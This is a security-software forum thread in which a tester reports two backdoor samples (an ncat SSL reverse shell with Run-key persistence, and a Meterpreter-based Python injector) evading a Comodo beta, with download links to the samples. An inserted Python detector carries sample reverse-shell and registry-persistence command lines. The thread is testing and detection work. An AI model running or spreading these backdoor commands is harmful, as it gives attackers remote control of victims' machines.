CIS Bypassed By BackDoor Malware [V7B][M824]

hi

  1. Product version: COMODO Internet Security 7.0.308911.4080 BETA
  2. Operating System: XP SP3 (x32), running in VMware Player
  3. Configuration: Default IS configuration
  4. Link to test backdoor 1 in Partially Limited:
     http://www.gulfup.com/?n9c5sd
     Link to test backdoor 2:
     http://www.gulfup.com/?waI603
     ==
     Link to test backdoors 1 and 2 in Limited:
     http://www.gulfup.com/?dgD5ZM

Comodo has known issues with VirtualBox…try it on VMware Player.

ok :azn:

If this does replicate on VMWare please also edit your first post such that it is in the format provided here:
https://forums.comodo.com/bug-reports-beta-corner-cis/required-beta-bug-reporting-format-t101349.0.html

This will ensure that the devs have enough information to replicate this.

Thanks.

It has been re-tested in VMware Player.

Thank you. Could you please summarize what exactly these pieces of malware are able to do?

Thanks again.

Backdoor 1

It is the ncat tool used as a backdoor, acting as a shell (on the target) for a server on the attacker's system, and packed with a .bat file.
Role of the .bat file:

  • allows the ncat command on the target to connect to the server through an SSL-encrypted channel
  • makes a registry value for ncat which allows the backdoor to keep working after reboot

Backdoor 2

It is an encrypted Python backdoor which injects PowerShell into memory in a VirtualAlloc pattern using a Meterpreter payload.
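The backdoor 1 persistence pattern described in the post above, as an added example that is not part of the report or of Comodo's software: a small Python checker that walks a .reg export of the Run key and a .bat wrapper and flags the traits the poster names (a netcat-family binary, --ssl, -e/--exec handing the socket to cmd.exe, and a Run value for reboot persistence). The .reg and .bat inputs are constructed for the example, the value name svchost and the path C:\Windows\Temp\nc\ are invented, and 203.0.113.10 is a documentation address; only ncat's -e/--exec, -c/--sh-exec and --ssl options are modelled, other value-taking flags are not.

```python
"""Spot the backdoor-1 pattern from the report: a netcat-family binary launched
with --ssl and -e/--exec, persisted via a Run registry value that is written
either directly or by a .bat wrapper using `reg add`.  All inputs below are
constructed samples; 203.0.113.10 is a documentation address."""
import re

NETCAT_NAMES = {"ncat", "ncat.exe", "nc", "nc.exe", "netcat", "netcat.exe"}
EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}  # ncat options that hand the socket to a program
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE)
REG_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)+)"="((?:[^"\\]|\\.)*)"$')

# Constructed .reg export of HKCU\...\Run: one benign entry, one planted by the wrapper.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"svchost"="C:\\Windows\\Temp\\nc\\ncat.exe --ssl 203.0.113.10 443 -e cmd.exe"
"""

# Constructed .bat wrapper of the kind the report describes (value name "svchost" is invented).
SAMPLE_BATCH = r"""@echo off
rem constructed wrapper: persist ncat under Run, then start the TLS reverse shell
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchost /t REG_SZ /d "C:\Windows\Temp\nc\ncat.exe --ssl 203.0.113.10 443 -e cmd.exe" /f
start /b "" C:\Windows\Temp\nc\ncat.exe --ssl 203.0.113.10 443 -e cmd.exe
"""


def tokenize(cmd):
    """Split a Windows command line on whitespace, keeping quoted arguments as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_command(cmd):
    """Return the suspicious traits found in one command line (empty list if nothing matches)."""
    tokens = tokenize(cmd)
    reasons = []
    # Case 1: the wrapper's persistence step, `reg add ...\Run ... /d "<command>"`.
    if (len(tokens) >= 3 and basename(tokens[0]) in {"reg", "reg.exe"}
            and tokens[1].lower() == "add" and RUN_KEY_RE.search(tokens[2])):
        reasons.append("writes an autorun value under ...\\CurrentVersion\\Run")
        lowered = [t.lower() for t in tokens]
        if "/d" in lowered and lowered.index("/d") + 1 < len(tokens):
            reasons += analyze_command(tokens[lowered.index("/d") + 1])  # inspect the planted command
        return reasons
    # Case 2: a netcat-family binary anywhere on the line (covers `start /b ncat ...`, `cmd /c ncat ...`).
    idx = next((i for i, t in enumerate(tokens) if basename(t) in NETCAT_NAMES), None)
    if idx is None:
        return reasons
    reasons.append(f"netcat-family binary ({basename(tokens[idx])})")
    positional, i = [], idx + 1
    while i < len(tokens):
        t = tokens[i]
        if t in EXEC_FLAGS and i + 1 < len(tokens):
            reasons.append(f"hands the connection to a program ({t} {tokens[i + 1]})")
            i += 2
            continue
        if t == "--ssl":
            reasons.append("TLS-wrapped channel (--ssl)")
        elif not t.startswith("-"):
            positional.append(t)
        i += 1
    if len(positional) >= 2 and positional[-1].isdigit():  # ncat [options] host port
        reasons.append(f"connects out to {positional[-2]}:{positional[-1]}")
    return reasons


def run_values_from_reg_export(text):
    """Yield (value_name, command) for string values under a ...\\Run key in a .reg export."""
    def unescape(s):  # .reg escapes: \\ -> \ and \" -> "
        return re.sub(r"\\(.)", r"\1", s)
    in_run_key = False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_run_key = bool(RUN_KEY_RE.search(line[1:-1]))
            continue
        m = REG_VALUE_RE.match(line)
        if in_run_key and m:
            yield unescape(m.group(1)), unescape(m.group(2))


def scan(reg_export, batch_script):
    """Return [(where, reasons), ...] for every Run value and batch line that looks like the backdoor."""
    findings = []
    for name, cmd in run_values_from_reg_export(reg_export):
        reasons = analyze_command(cmd)
        if reasons:
            findings.append((f"Run value {name}", reasons))
    for n, line in enumerate(batch_script.splitlines(), 1):
        s = line.strip()
        if not s or s.lower().startswith(("rem ", "::", "@echo")):
            continue
        reasons = analyze_command(s)
        if reasons:
            findings.append((f"batch line {n}", reasons))
    return findings


if __name__ == "__main__":
    for where, reasons in scan(SAMPLE_REG_EXPORT, SAMPLE_BATCH):
        print(where)
        for r in reasons:
            print("  -", r)
```

On a real host you would feed `scan()` the output of `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg` (and the HKLM equivalent) plus any .bat the Run values point at; the value name and binary path will differ from the sample, which is why the check keys on the ncat option pattern rather than on names.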

Is it also able to bypass Limited? If so, what about Restricted?

Link to backdoors 1 and 2 :wink:
http://www.gulfup.com/?dgD5ZM

Thank you. Could you please edit your first post so that it is in the required format. Also, please attach a diagnostics report.

In addition, could you please PM me a download link for the POC? I will adhere to the rules you presented in your other bug report, and in addition I promise not to share it with any other users. I will just put a download link in the tracker so the devs can use this for testing.

Thank you.

Thank you very much for your report in standard format, with all information supplied. The care you have taken is much appreciated by Comodo, and will increase the likelihood that this bug can be fixed.

Developers may or may not communicate with you in the forum or by PM/IM, depending on time availability and need. Because you have supplied complete information they may be able to replicate and fix the bug without doing so.

Many thanks again.

From my understanding, the devs have not been able to confirm this as a legitimate bypass. Thus, I will move this to Resolved. I will let you know if I receive an update on this status.

Thanks.